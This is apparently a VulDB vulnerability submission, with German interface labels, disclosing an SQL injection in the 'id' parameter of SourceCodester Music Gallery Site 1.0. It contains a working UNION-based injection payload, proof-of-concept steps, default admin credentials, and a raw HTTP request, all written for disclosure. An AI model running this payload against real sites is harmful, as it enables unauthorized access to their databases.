Submit #95249: SourceCodester Music Gallery Site 1.0 : GET Request based sql injection at endpoint /admin/?page=user/manage info

TitelSourceCodester Music Gallery Site 1.0 : GET Request based sql injection at endpoint /admin/?page=user/manage
Beschreibung## Vendor Homepage: https://www.sourcecodester.com ## Software Link: https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html ## Version: v 1.0 ## Vulnerable URL: /php-music/admin/?page=user/manage_user&id= ## Payload : /php-music/admin/?page=user/manage_user&id=3%27+and+false+union+select+1,version(),@@datadir,4,5,6,7,8,9,10,11--+- ## Affected page: On the page "/admin?page=user/manage_user&id=", the parameter "id" is vulnerable to SQL Injection ## Description: In Music Gallery site , after login as admin ,under the user list tab. By updating the user list and intercepting the request upon clicking on view ,the GET request "id" parameter is vulnerable to SQL Injection. ## Proof of concept 1. click on the admin panel and login with the credentials. the admin credials are username:admin & password admin123 2. browse to users list. 3. click on actions and edit option. 4. intercept the traffic through burp and get the actual URL 5 . add the payload "%27+and+false+union+select+1,version(),@@datadir,4,5,6,7,8,9,10,11--+-" to the "id"parameter Request --------- GET /php-music/admin/?page=user/manage_user&id=3%27+and+false+union+select+1,version(),@@datadir,4,5,6,7,8,9,10,11--+- HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://localhost/php-music/admin/?page=user/list Cookie: PHPSESSID=pkk15gn7r4j3nrksvms44fd15t Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1
Benutzer
 Anonymous User
Einreichung27.02.2023 11:06 (vor 3 Jahren)
Moderieren27.02.2023 11:43 (37 minutes later)
StatusAkzeptiert
VulDB Eintrag221820 [SourceCodester Music Gallery Site 1.0 /admin/?page=user/manage ID SQL Injection]
Punkte17

ZurückÜbersichtWeiter

Might our Artificial Intelligence support you?

Check our Alexa App!